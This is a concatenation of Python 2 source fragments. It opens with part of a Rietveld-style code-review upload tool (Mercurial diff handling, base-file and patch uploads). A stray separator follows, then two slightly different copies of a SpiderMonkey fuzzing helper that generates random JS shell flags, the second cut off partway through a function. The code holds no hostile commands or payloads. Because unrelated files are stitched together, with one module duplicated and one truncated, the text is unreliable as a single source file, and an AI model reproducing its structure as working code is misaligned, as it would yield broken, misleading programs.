def RunShell(command, silent_ok=False, universal_newlines=True,
             print_output=False, env=os.environ):
    """Run *command* and return its stdout, aborting the program on failure.

    Exits via ErrorExit when the command returns a nonzero status, or when
    it produces no output and silent_ok is False.
    """
    output, status = RunShellWithReturnCode(command, print_output,
                                            universal_newlines, env)
    if status:
        ErrorExit("Got error status from %s:\n%s" % (command, output))
    if not (silent_ok or output):
        ErrorExit("No output from %s" % command)
    return output
class VersionControlSystem(object):
    """Abstract base class providing an interface to the VCS."""

    def __init__(self, options):
        """Constructor.

        Args:
          options: Command line options.
        """
        self.options = options

    def GenerateDiff(self, args):
        """Return the current diff as a string.

        Args:
          args: Extra arguments to pass to the diff command.
        """
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def GetUnknownFiles(self):
        """Return a list of files unknown to the VCS."""
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def CheckForUnknownFiles(self):
        """Show an "are you sure?" prompt if there are unknown files."""
        unknown_files = self.GetUnknownFiles()
        if unknown_files:
            print "The following files are not added to version control:"
            for line in unknown_files:
                print line
            prompt = "Are you sure to continue?(y/N) "
            answer = raw_input(prompt).strip()
            if answer != "y":
                ErrorExit("User aborted")

    def GetBaseFile(self, filename):
        """Get the content of the upstream version of a file.

        Returns:
          A tuple (base_content, new_content, is_binary, status)
            base_content: The contents of the base file.
            new_content: For text files, this is empty. For binary files, this is
              the contents of the new file, since the diff output won't contain
              information to reconstruct the current file.
            is_binary: True iff the file is binary.
            status: The status of the file.
        """
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def GetBaseFiles(self, diff):
        """Helper that calls GetBase file for each file in the patch.

        Returns:
          A dictionary that maps from filename to GetBaseFile's tuple. Filenames
          are retrieved based on lines that start with "Index:" or
          "Property changes on:".
        """
        files = {}
        for line in diff.splitlines(True):
            if line.startswith('Index:') or line.startswith('Property changes on:'):
                unused, filename = line.split(':', 1)
                # On Windows if a file has property changes its filename uses '\'
                # instead of '/'.
                filename = to_slash(filename.strip())
                files[filename] = self.GetBaseFile(filename)
        return files

    def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
                        files):
        """Uploads the base files (and if necessary, the current ones as well)."""

        def UploadFile(filename, file_id, content, is_binary, status, is_base):
            """Uploads a file to the server."""
            set_status("uploading " + filename)
            file_too_large = False
            if is_base:
                type = "base"
            else:
                type = "current"
            if len(content) > MAX_UPLOAD_SIZE:
                # Oversized content is replaced with an empty body plus a
                # file_too_large marker so the server knows it was skipped.
                print ("Not uploading the %s file for %s because it's too large." %
                       (type, filename))
                file_too_large = True
                content = ""
            checksum = md5(content).hexdigest()
            if options.verbose > 0 and not file_too_large:
                print "Uploading %s file for %s" % (type, filename)
            url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
            form_fields = [
                ("filename", filename),
                ("status", status),
                ("checksum", checksum),
                ("is_binary", str(is_binary)),
                ("is_current", str(not is_base)),
            ]
            if file_too_large:
                form_fields.append(("file_too_large", "1"))
            if options.email:
                form_fields.append(("user", options.email))
            ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
            response_body = rpc_server.Send(url, body, content_type=ctype)
            if not response_body.startswith("OK"):
                StatusUpdate(" --> %s" % response_body)
                sys.exit(1)

        # Don't want to spawn too many threads, nor do we want to
        # hit Rietveld too hard, or it will start serving 500 errors.
        # When 8 works, it's no better than 4, and sometimes 8 is
        # too many for Rietveld to handle.
        MAX_PARALLEL_UPLOADS = 4

        sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
        upload_threads = []
        finished_upload_threads = []

        class UploadFileThread(threading.Thread):
            # One upload per thread; the semaphore caps concurrency.
            def __init__(self, args):
                threading.Thread.__init__(self)
                self.args = args

            def run(self):
                UploadFile(*self.args)
                finished_upload_threads.append(self)
                sema.release()

        def StartUploadFile(*args):
            # Blocks until an upload slot is free, reaps finished threads,
            # then kicks off a new upload thread.
            sema.acquire()
            while len(finished_upload_threads) > 0:
                t = finished_upload_threads.pop()
                upload_threads.remove(t)
                t.join()
            t = UploadFileThread(args)
            upload_threads.append(t)
            t.start()

        def WaitForUploads():
            for t in upload_threads:
                t.join()

        # Invert patch_list into filename -> patch key.
        patches = dict()
        [patches.setdefault(v, k) for k, v in patch_list]
        for filename in patches.keys():
            base_content, new_content, is_binary, status = files[filename]
            file_id_str = patches.get(filename)
            if file_id_str.find("nobase") != -1:
                # "nobase" keys mean the server doesn't need the base file;
                # the numeric id follows the last underscore.
                base_content = None
                file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
            file_id = int(file_id_str)
            if base_content != None:
                StartUploadFile(filename, file_id, base_content, is_binary, status, True)
            if new_content != None:
                StartUploadFile(filename, file_id, new_content, is_binary, status, False)
        WaitForUploads()

    def IsImage(self, filename):
        """Returns true if the filename has an image extension."""
        mimetype = mimetypes.guess_type(filename)[0]
        if not mimetype:
            return False
        return mimetype.startswith("image/")

    def IsBinary(self, filename):
        """Returns true if the guessed mimetyped isnt't in text group."""
        mimetype = mimetypes.guess_type(filename)[0]
        if not mimetype:
            return False  # e.g. README, "real" binaries usually have an extension
        # special case for text files which don't start with text/
        if mimetype in TEXT_MIMETYPES:
            return False
        return not mimetype.startswith("text/")
class FakeMercurialUI(object):
    """Minimal stand-in for Mercurial's ui object.

    Captures everything hg writes into self.output (instead of the terminal)
    and forwards config/path lookups to the real global_ui.
    """

    def __init__(self):
        self.quiet = True
        self.output = ''

    def write(self, *args, **opts):
        # Accumulate output so callers can inspect it after the command runs.
        self.output += ' '.join(args)

    def copy(self):
        # hg expects ui.copy() to return a usable ui; sharing self suffices here.
        return self

    def status(self, *args, **opts):
        pass

    def formatter(self, topic, opts):
        from mercurial.formatter import plainformatter
        return plainformatter(self, topic, opts)

    def readconfig(self, *args, **opts):
        pass

    def expandpath(self, *args, **opts):
        return global_ui.expandpath(*args, **opts)

    def configitems(self, *args, **opts):
        return global_ui.configitems(*args, **opts)

    def config(self, *args, **opts):
        return global_ui.config(*args, **opts)
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
    """Implementation of the VersionControlSystem interface for Mercurial."""

    def __init__(self, options, ui, repo):
        super(MercurialVCS, self).__init__(options)
        self.ui = ui
        self.repo = repo
        self.status = None  # cached 'hg status -C' output; filled lazily
        # Absolute path to repository (we can be in a subdir)
        self.repo_dir = os.path.normpath(repo.root)
        # Compute the subdir
        cwd = os.path.normpath(os.getcwd())
        assert cwd.startswith(self.repo_dir)
        self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
        if self.options.revision:
            self.base_rev = self.options.revision
        else:
            # Prefer the mq parent (qparent) as the base when patch queues
            # are in use; otherwise fall back to the working dir's parent.
            mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
            if not err and mqparent != "":
                self.base_rev = mqparent
            else:
                out = RunShell(["hg", "parents", "-q"], silent_ok=True).strip()
                if not out:
                    # No revisions; use 0 to mean a repository with nothing.
                    out = "0:0"
                self.base_rev = out.split(':')[1].strip()

    def _GetRelPath(self, filename):
        """Get relative path of a file according to the current directory,
        given its logical path in the repo."""
        assert filename.startswith(self.subdir), (filename, self.subdir)
        return filename[len(self.subdir):].lstrip(r"\/")

    def GenerateDiff(self, extra_args):
        """Return the diff against base_rev, rewritten into svn-diff shape."""
        # If no file specified, restrict to the current subdir
        extra_args = extra_args or ["."]
        cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
        data = RunShell(cmd, silent_ok=True)
        svndiff = []
        filecount = 0
        for line in data.splitlines():
            m = re.match("diff --git a/(\S+) b/(\S+)", line)
            if m:
                # Modify line to make it look like as it comes from svn diff.
                # With this modification no changes on the server side are required
                # to make upload.py work with Mercurial repos.
                # NOTE: for proper handling of moved/copied files, we have to use
                # the second filename.
                filename = m.group(2)
                svndiff.append("Index: %s" % filename)
                svndiff.append("=" * 67)
                filecount += 1
                logging.info(line)
            else:
                svndiff.append(line)
        if not filecount:
            ErrorExit("No valid patches found in output from hg diff")
        return "\n".join(svndiff) + "\n"

    def GetUnknownFiles(self):
        """Return a list of files unknown to the VCS."""
        args = []  # NOTE(review): unused; kept as-is
        status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
                          silent_ok=True)
        unknown_files = []
        for line in status.splitlines():
            st, fn = line.split(" ", 1)
            if st == "?":
                unknown_files.append(fn)
        return unknown_files

    def get_hg_status(self, rev, path):
        """Return the status line(s) for *path* from cached 'hg status -C' output."""
        # We'd like to use 'hg status -C path', but that is buggy
        # (see http://mercurial.selenic.com/bts/issue3023).
        # Instead, run 'hg status -C' without a path
        # and skim the output for the path we want.
        if self.status is None:
            if use_hg_shell:
                out = RunShell(["hg", "status", "-C", "--rev", rev])
            else:
                fui = FakeMercurialUI()
                ret = hg_commands.status(fui, self.repo, *[], **{'rev': [rev], 'copies': True})
                if ret:
                    raise hg_util.Abort(ret)
                out = fui.output
            self.status = out.splitlines()
        for i in range(len(self.status)):
            # line is
            # A path
            # M path
            # etc
            line = to_slash(self.status[i])
            if line[2:] == path:
                # A following indented line is the copy source for this entry.
                if i+1 < len(self.status) and self.status[i+1][:2] == ' ':
                    return self.status[i:i+2]
                return self.status[i:i+1]
        raise hg_util.Abort("no status for " + path)

    def GetBaseFile(self, filename):
        """Return (base_content, new_content, is_binary, status) for *filename*."""
        set_status("inspecting " + filename)
        # "hg status" and "hg cat" both take a path relative to the current subdir
        # rather than to the repo root, but "hg diff" has given us the full path
        # to the repo root.
        base_content = ""
        new_content = None
        is_binary = False
        oldrelpath = relpath = self._GetRelPath(filename)
        out = self.get_hg_status(self.base_rev, relpath)
        status, what = out[0].split(' ', 1)
        if len(out) > 1 and status == "A" and what == relpath:
            # An "A" with a copy source is really a move/copy: treat as modified
            # relative to the old path.
            oldrelpath = out[1].strip()
            status = "M"
        if ":" in self.base_rev:
            base_rev = self.base_rev.split(":", 1)[0]
        else:
            base_rev = self.base_rev
        if status != "A":
            if use_hg_shell:
                base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
            else:
                base_content = str(self.repo[base_rev][oldrelpath].data())
            is_binary = "\0" in base_content  # Mercurial's heuristic
        if status != "R":
            new_content = open(relpath, "rb").read()
            is_binary = is_binary or "\0" in new_content
        if is_binary and base_content and use_hg_shell:
            # Fetch again without converting newlines
            base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
                                    silent_ok=True, universal_newlines=False)
        if not is_binary or not self.IsImage(relpath):
            # The server only needs new_content for binary images.
            new_content = None
        return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
    """Splits a patch into separate pieces for each file.

    Args:
      data: A string containing the output of svn diff.

    Returns:
      A list of 2-tuple (filename, text) where text is the svn diff output
      pertaining to filename.
    """
    patches = []
    current_name = None
    current_lines = []

    def flush():
        # Emit the accumulated diff for the current file, if any.
        if current_name and current_lines:
            patches.append((current_name, ''.join(current_lines)))

    for line in data.splitlines(True):
        next_name = None
        if line.startswith('Index:'):
            next_name = line.split(':', 1)[1].strip()
        elif line.startswith('Property changes on:'):
            # When a file is modified, paths use '/' between directories, however
            # when a property is modified '\' is used on Windows. Make them the same
            # otherwise the file shows up twice.
            candidate = to_slash(line.split(':', 1)[1].strip())
            if candidate != current_name:
                # File has property changes but no modifications: start a new diff.
                next_name = candidate
        if next_name:
            flush()
            current_name = next_name
            current_lines = [line]
        else:
            current_lines.append(line)
    flush()
    return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
    """Uploads a separate patch for each file in the diff output.

    Returns a list of [patch_key, filename] for each file.
    """
    patches = SplitPatch(data)
    rv = []
    for patch in patches:
        set_status("uploading patch for " + patch[0])
        if len(patch[1]) > MAX_UPLOAD_SIZE:
            # Oversized patches are skipped entirely (not truncated).
            print ("Not uploading the patch for " + patch[0] +
                   " because the file is too large.")
            continue
        form_fields = [("filename", patch[0])]
        if not options.download_base:
            form_fields.append(("content_upload", "1"))
        files = [("data", "data.diff", patch[1])]
        ctype, body = EncodeMultipartFormData(form_fields, files)
        url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
        print "Uploading patch for " + patch[0]
        response_body = rpc_server.Send(url, body, content_type=ctype)
        # The server replies "OK" on the first line and the patch key on the second.
        lines = response_body.splitlines()
        if not lines or lines[0] != "OK":
            StatusUpdate(" --> %s" % response_body)
            sys.exit(1)
        rv.append([lines[1], patch[0]])
    return rv
|
import multiprocessing
import os
import random
import sys

import inspectShell

# Make the sibling ../util directory importable so the shared subprocess
# helpers can be used below.
path0 = os.path.dirname(os.path.abspath(__file__))
path1 = os.path.abspath(os.path.join(path0, os.pardir, 'util'))
sys.path.append(path1)
import subprocesses as sps
def memoize(f, cache={}):
    '''Function decorator that caches function results.

    The shared mutable default `cache` is intentional: it holds results for
    every memoized function, keyed by (function, args, kwargs).
    '''
    # From http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/#c9
    import functools

    @functools.wraps(f)  # preserve f's name/docstring on the wrapper
    def g(*args, **kwargs):
        key = (f, tuple(args), frozenset(kwargs.items()))
        if key not in cache:
            cache[key] = f(*args, **kwargs)
        return cache[key]
    return g
@memoize
def shellSupportsFlag(shellPath, flag):
    """Return True if the js shell at shellPath accepts *flag*.

    Probes by running a trivial program ('-e 42') with the flag; results are
    cached by @memoize because probing spawns a subprocess.
    """
    return inspectShell.shellSupports(shellPath, [flag, '-e', '42'])
def chance(p):
    """Return True with probability p (p in [0.0, 1.0])."""
    roll = random.random()
    return roll < p
def randomFlagSet(shellPath):
    '''
    Returns a random list of command-line flags appropriate for the given shell.
    Only works for spidermonkey js shell. Does not work for xpcshell.
    '''
    args = []
    # Whether to enable Ion at all (80% of the time, when supported);
    # the Ion-specific flag block near the end keys off this.
    ion = shellSupportsFlag(shellPath, "--ion") and chance(.8)
    if shellSupportsFlag(shellPath, '--fuzzing-safe'):
        args.append("--fuzzing-safe")  # --fuzzing-safe landed in bug 885361
    # See bug 932517, which had landed to fix this issue. Keeping this around for archives:
    # Original breakage in m-c rev 269359 : https://hg.mozilla.org/mozilla-central/rev/a0ccab2a6e28
    # Fix in m-c rev 269896: https://hg.mozilla.org/mozilla-central/rev/3bb8446a6d8d
    # Anything in-between involving let probably needs "-e 'version(185);'" to see if we can bypass breakage
    # if shellSupportsFlag(shellPath, "--execute='version(185);'"):
    # args.append("--execute='version(185);'")
    if shellSupportsFlag(shellPath, '--ion-sincos=on') and chance(.5):
        sincosValue = "on" if chance(0.5) else "off"
        args.append("--ion-sincos=" + sincosValue)  # --ion-sincos=[on|off] landed in bug 984018
    if shellSupportsFlag(shellPath, '--ion-instruction-reordering=on') and chance(.2):
        args.append("--ion-instruction-reordering=on")  # --ion-instruction-reordering=on landed in bug 1195545
    if shellSupportsFlag(shellPath, '--ion-shared-stubs=on') and chance(.2):
        args.append("--ion-shared-stubs=on")  # --ion-shared-stubs=on landed in bug 1168756
    if shellSupportsFlag(shellPath, '--non-writable-jitcode') and chance(.3):
        args.append("--non-writable-jitcode")  # --non-writable-jitcode landed in bug 977805
    if shellSupportsFlag(shellPath, "--execute='setJitCompilerOption(\"ion.forceinlineCaches\", 1)'") and chance(.1):
        args.append("--execute='setJitCompilerOption(\"ion.forceinlineCaches\", 1)'")
    if shellSupportsFlag(shellPath, '--no-cgc') and chance(.1):
        args.append("--no-cgc")  # --no-cgc landed in bug 1126769
    if shellSupportsFlag(shellPath, '--no-ggc') and chance(.1):
        args.append("--no-ggc")  # --no-ggc landed in bug 706885
    if shellSupportsFlag(shellPath, '--no-incremental-gc') and chance(.1):
        args.append("--no-incremental-gc")  # --no-incremental-gc landed in bug 958492
    if shellSupportsFlag(shellPath, '--no-unboxed-objects') and chance(.2):
        args.append("--no-unboxed-objects")  # --no-unboxed-objects landed in bug 1162199
    #if shellSupportsFlag(shellPath, '--ion-sink=on') and chance(.2):
    # args.append("--ion-sink=on")  # --ion-sink=on landed in bug 1093674
    if shellSupportsFlag(shellPath, '--gc-zeal=0') and chance(.9):
        gczealValue = 14 if chance(0.5) else random.randint(0, 14)  # Focus test compacting GC (14)
        args.append("--gc-zeal=" + str(gczealValue))  # --gc-zeal= landed in bug 1101602
    if shellSupportsFlag(shellPath, '--enable-small-chunk-size') and chance(.1):
        args.append("--enable-small-chunk-size")  # --enable-small-chunk-size landed in bug 941804
    if shellSupportsFlag(shellPath, '--ion-loop-unrolling=on') and chance(.2):
        args.append("--ion-loop-unrolling=on")  # --ion-loop-unrolling=on landed in bug 1039458
    if shellSupportsFlag(shellPath, '--no-threads') and chance(.5):
        args.append("--no-threads")  # --no-threads landed in bug 1031529
    if shellSupportsFlag(shellPath, '--disable-ion') and chance(.05):
        args.append("--disable-ion")  # --disable-ion landed in bug 789319
    # See bug 1026919 comment 60:
    if sps.isARMv7l and \
            shellSupportsFlag(shellPath, '--arm-asm-nop-fill=0') and chance(0.3):
        # It was suggested to focus more on the range between 0 and 1.
        # Reduced the upper limit to 8, see bug 1053996 comment 8.
        asmNopFill = random.randint(1, 8) if chance(0.3) else random.randint(0, 1)
        args.append("--arm-asm-nop-fill=" + str(asmNopFill))  # Landed in bug 1020834
    # See bug 1026919 comment 60:
    if sps.isARMv7l and \
            shellSupportsFlag(shellPath, '--asm-pool-max-offset=1024') and chance(0.3):
        asmPoolMaxOffset = random.randint(5, 1024)
        args.append("--asm-pool-max-offset=" + str(asmPoolMaxOffset))  # Landed in bug 1026919
    if shellSupportsFlag(shellPath, '--no-native-regexp') and chance(.1):
        args.append("--no-native-regexp")  # See bug 976446
    if inspectShell.queryBuildConfiguration(shellPath, 'arm-simulator') and chance(.4):
        args.append('--arm-sim-icache-checks')
    if (shellSupportsFlag(shellPath, '--no-sse3') and shellSupportsFlag(shellPath, '--no-sse4')) and chance(.2):
        # --no-sse3 and --no-sse4 landed in m-c rev 526ba3ace37a.
        if chance(.5):
            args.append("--no-sse3")
        else:
            args.append("--no-sse4")
    if shellSupportsFlag(shellPath, '--no-fpu') and chance(.2):
        args.append("--no-fpu")  # --no-fpu landed in bug 858022
    if shellSupportsFlag(shellPath, '--no-asmjs') and chance(.5):
        args.append("--no-asmjs")
    # --baseline-eager landed after --no-baseline on the IonMonkey branch prior to landing on m-c.
    if shellSupportsFlag(shellPath, '--baseline-eager'):
        if chance(.3):
            args.append('--no-baseline')
        # elif is important, as we want to call --baseline-eager only if --no-baseline is not set.
        elif chance(.6):
            args.append("--baseline-eager")
    if shellSupportsFlag(shellPath, '--ion-offthread-compile=off'):
        if chance(.7):
            # Focus on the reproducible cases
            args.append("--ion-offthread-compile=off")
        elif chance(.5) and multiprocessing.cpu_count() > 1 and \
                shellSupportsFlag(shellPath, '--thread-count=1'):
            # Adjusts default number of threads for parallel compilation (turned on by default)
            totalThreads = random.randint(2, (multiprocessing.cpu_count() * 2))
            args.append('--thread-count=' + str(totalThreads))
        # else:
        # Default is to have --ion-offthread-compile=on and --thread-count=<some default value>
    elif shellSupportsFlag(shellPath, '--ion-parallel-compile=off'):
        # --ion-parallel-compile=off has gone away as of m-c rev 9ab3b097f304 and f0d67b1ccff9.
        if chance(.7):
            # Focus on the reproducible cases
            args.append("--ion-parallel-compile=off")
        elif chance(.5) and multiprocessing.cpu_count() > 1 and \
                shellSupportsFlag(shellPath, '--thread-count=1'):
            # Adjusts default number of threads for parallel compilation (turned on by default)
            totalThreads = random.randint(2, (multiprocessing.cpu_count() * 2))
            args.append('--thread-count=' + str(totalThreads))
        # else:
        # The default is to have --ion-parallel-compile=on and --thread-count=<some default value>
    if ion:
        if chance(.6):
            args.append("--ion-eager")
        if chance(.2):
            args.append("--ion-gvn=off")
        if chance(.2):
            args.append("--ion-licm=off")
        if shellSupportsFlag(shellPath, '--ion-edgecase-analysis=off') and chance(.2):
            args.append("--ion-edgecase-analysis=off")
        if chance(.2):
            args.append("--ion-range-analysis=off")
        if chance(.2):
            args.append("--ion-inlining=off")
        if chance(.2):
            args.append("--ion-osr=off")
        if chance(.2):
            args.append("--ion-limit-script-size=off")
        # Backtracking (on by default as of 2015-04-15) and stupid landed in m-c changeset dc4887f61d2e
        # The stupid allocator isn't used by default and devs prefer not to have to fix fuzzbugs
        #if shellSupportsFlag(shellPath, '--ion-regalloc=stupid') and chance(.2):
        #args.append('--ion-regalloc=stupid')
        if shellSupportsFlag(shellPath, '--ion-regalloc=testbed') and chance(.2):
            args.append('--ion-regalloc=testbed')
        if shellSupportsFlag(shellPath, '--ion-check-range-analysis'):
            if chance(.3):
                args.append('--ion-check-range-analysis')
        if shellSupportsFlag(shellPath, '--ion-extra-checks'):
            if chance(.3):
                args.append('--ion-extra-checks')
    else:
        args.append("--no-ion")
    #if chance(.05):
    # args.append("--execute=verifyprebarriers()")
    if chance(.05):
        args.append("-D")  # aka --dump-bytecode
    return args
def basicFlagSets(shellPath):
    '''
    compareJIT uses these combinations of flags (as well as the original set of flags) when run
    through Lithium and autoBisect.

    The three branches pick the flag vocabulary the given shell understands,
    newest first: --no-threads, then --ion-offthread-compile, then the legacy
    --ion-parallel-compile.
    '''
    if shellSupportsFlag(shellPath, "--no-threads"):
        basicFlagList = [
            # Parts of this flag permutation come from:
            # https://hg.mozilla.org/mozilla-central/file/e3bf27190360/js/src/tests/lib/tests.py#l12
            ['--fuzzing-safe', '--no-threads', '--ion-eager'],  # compareJIT uses this first flag set as the sole baseline when fuzzing
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'],
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--baseline-eager'],
            ['--fuzzing-safe', '--no-threads', '--baseline-eager'],
            ['--fuzzing-safe', '--no-threads', '--baseline-eager', '--no-fpu'],
            ['--fuzzing-safe', '--no-threads', '--no-baseline', '--no-ion'],
            ['--fuzzing-safe', '--no-threads', '--no-ion'],  # See bug 1203862
        ]
        if shellSupportsFlag(shellPath, "--non-writable-jitcode"):
            basicFlagList.append(['--fuzzing-safe', '--no-threads', '--ion-eager',
                                  '--non-writable-jitcode', '--ion-check-range-analysis',
                                  '--ion-extra-checks', '--no-sse3'])
        return basicFlagList
    elif shellSupportsFlag(shellPath, "--ion-offthread-compile=off"):
        basicFlagList = [
            # Parts of this flag permutation come from:
            # https://hg.mozilla.org/mozilla-central/file/84bd8d9f4256/js/src/tests/lib/tests.py#l12
            # as well as other interesting flag combinations that have found / may find new bugs.
            ['--fuzzing-safe', '--ion-offthread-compile=off'],  # compareJIT uses this first flag set as the sole baseline when fuzzing
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline', '--no-ion'],
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline', '--ion-eager'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--no-ion'],  # Not in jit_test.py though, see bug 848906 comment 1
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--no-fpu'],
        ]
        if shellSupportsFlag(shellPath, "--thread-count=1"):
            basicFlagList.append(['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'])
        # Range analysis had only started to stabilize around the time when --no-sse3 landed.
        if shellSupportsFlag(shellPath, '--no-sse3'):
            basicFlagList.append(['--fuzzing-safe', '--ion-offthread-compile=off',
                                  '--ion-eager', '--ion-check-range-analysis', '--no-sse3'])
        return basicFlagList
    else:
        basicFlagList = [
            # Parts of this flag permutation come from:
            # https://hg.mozilla.org/mozilla-central/file/10932f3a0ba0/js/src/tests/lib/tests.py#l12
            # as well as other interesting flag combinations that have found / may find new bugs.
            ['--fuzzing-safe', '--ion-parallel-compile=off'],  # compareJIT uses this first flag set as the sole baseline when fuzzing
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline', '--no-ion'],
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline', '--ion-eager'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--ion-eager'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager'],
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager', '--no-ion'],  # See bug 848906 comment 1
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager', '--no-fpu'],
        ]
        if shellSupportsFlag(shellPath, "--thread-count=1"):
            basicFlagList.append(['--fuzzing-safe', '--ion-eager', '--ion-parallel-compile=off'])
        # Range analysis had only started to stabilize around the time when --no-sse3 landed.
        if shellSupportsFlag(shellPath, '--no-sse3'):
            basicFlagList.append(['--fuzzing-safe', '--ion-parallel-compile=off',
                                  '--ion-eager', '--ion-check-range-analysis', '--no-sse3'])
        return basicFlagList
# Consider adding a function (for compareJIT reduction) that takes a flag set
# and returns all its (meaningful) subsets.
def testRandomFlags():
    """Smoke test: print 100 random flag sets for the shell path given on argv[1]."""
    for _ in range(100):
        print ' '.join(randomFlagSet(sys.argv[1]))


if __name__ == "__main__":
    testRandomFlags()
# Disable fuzzing with --ion-shared-stubs=on until bug 1226816 is fixed.
import multiprocessing
import os
import random
import sys

import inspectShell

# Make the sibling ../util directory importable so the shared subprocess
# helpers can be used below.
path0 = os.path.dirname(os.path.abspath(__file__))
path1 = os.path.abspath(os.path.join(path0, os.pardir, 'util'))
sys.path.append(path1)
import subprocesses as sps
def memoize(f, cache={}):
    '''Function decorator that caches function results.

    The shared mutable default `cache` is intentional: it holds results for
    every memoized function, keyed by (function, args, kwargs).
    '''
    # From http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/#c9
    import functools

    @functools.wraps(f)  # preserve f's name/docstring on the wrapper
    def g(*args, **kwargs):
        key = (f, tuple(args), frozenset(kwargs.items()))
        if key not in cache:
            cache[key] = f(*args, **kwargs)
        return cache[key]
    return g
@memoize
def shellSupportsFlag(shellPath, flag):
    """Return True if the js shell at shellPath accepts *flag*.

    Probes by running a trivial program ('-e 42') with the flag; results are
    cached by @memoize because probing spawns a subprocess.
    """
    return inspectShell.shellSupports(shellPath, [flag, '-e', '42'])
def chance(p):
    """Return True with probability p (p in [0.0, 1.0])."""
    roll = random.random()
    return roll < p
def randomFlagSet(shellPath):
    '''
    Returns a random list of command-line flags appropriate for the given shell.
    Only works for spidermonkey js shell. Does not work for xpcshell.

    Each candidate flag is first probed via shellSupportsFlag(); a supported
    flag is then included with a hard-coded probability via chance().
    '''
    args = []
    # Decide up front whether this flag set uses Ion at all (80% when
    # supported); the `if ion:` block near the end adds Ion sub-flags,
    # otherwise --no-ion is appended.
    ion = shellSupportsFlag(shellPath, "--ion") and chance(.8)
    if shellSupportsFlag(shellPath, '--fuzzing-safe'):
        args.append("--fuzzing-safe")  # --fuzzing-safe landed in bug 885361
    # See bug 932517, which had landed to fix this issue. Keeping this around for archives:
    # Original breakage in m-c rev 269359 : https://hg.mozilla.org/mozilla-central/rev/a0ccab2a6e28
    # Fix in m-c rev 269896: https://hg.mozilla.org/mozilla-central/rev/3bb8446a6d8d
    # Anything in-between involving let probably needs "-e 'version(185);'" to see if we can bypass breakage
    # if shellSupportsFlag(shellPath, "--execute='version(185);'"):
    #     args.append("--execute='version(185);'")
    if shellSupportsFlag(shellPath, '--ion-sincos=on') and chance(.5):
        sincosValue = "on" if chance(0.5) else "off"
        args.append("--ion-sincos=" + sincosValue)  # --ion-sincos=[on|off] landed in bug 984018
    if shellSupportsFlag(shellPath, '--ion-instruction-reordering=on') and chance(.2):
        args.append("--ion-instruction-reordering=on")  # --ion-instruction-reordering=on landed in bug 1195545
    # Disabled until bug 1226816 is fixed.
    # if shellSupportsFlag(shellPath, '--ion-shared-stubs=on') and chance(.2):
    #     args.append("--ion-shared-stubs=on")  # --ion-shared-stubs=on landed in bug 1168756
    if shellSupportsFlag(shellPath, '--non-writable-jitcode') and chance(.3):
        args.append("--non-writable-jitcode")  # --non-writable-jitcode landed in bug 977805
    if shellSupportsFlag(shellPath, "--execute='setJitCompilerOption(\"ion.forceinlineCaches\", 1)'") and chance(.1):
        args.append("--execute='setJitCompilerOption(\"ion.forceinlineCaches\", 1)'")
    if shellSupportsFlag(shellPath, '--no-cgc') and chance(.1):
        args.append("--no-cgc")  # --no-cgc landed in bug 1126769
    if shellSupportsFlag(shellPath, '--no-ggc') and chance(.1):
        args.append("--no-ggc")  # --no-ggc landed in bug 706885
    if shellSupportsFlag(shellPath, '--no-incremental-gc') and chance(.1):
        args.append("--no-incremental-gc")  # --no-incremental-gc landed in bug 958492
    if shellSupportsFlag(shellPath, '--no-unboxed-objects') and chance(.2):
        args.append("--no-unboxed-objects")  # --no-unboxed-objects landed in bug 1162199
    # if shellSupportsFlag(shellPath, '--ion-sink=on') and chance(.2):
    #     args.append("--ion-sink=on")  # --ion-sink=on landed in bug 1093674
    if shellSupportsFlag(shellPath, '--gc-zeal=0') and chance(.9):
        gczealValue = 14 if chance(0.5) else random.randint(0, 14)  # Focus test compacting GC (14)
        args.append("--gc-zeal=" + str(gczealValue))  # --gc-zeal= landed in bug 1101602
    if shellSupportsFlag(shellPath, '--enable-small-chunk-size') and chance(.1):
        args.append("--enable-small-chunk-size")  # --enable-small-chunk-size landed in bug 941804
    if shellSupportsFlag(shellPath, '--ion-loop-unrolling=on') and chance(.2):
        args.append("--ion-loop-unrolling=on")  # --ion-loop-unrolling=on landed in bug 1039458
    if shellSupportsFlag(shellPath, '--no-threads') and chance(.5):
        args.append("--no-threads")  # --no-threads landed in bug 1031529
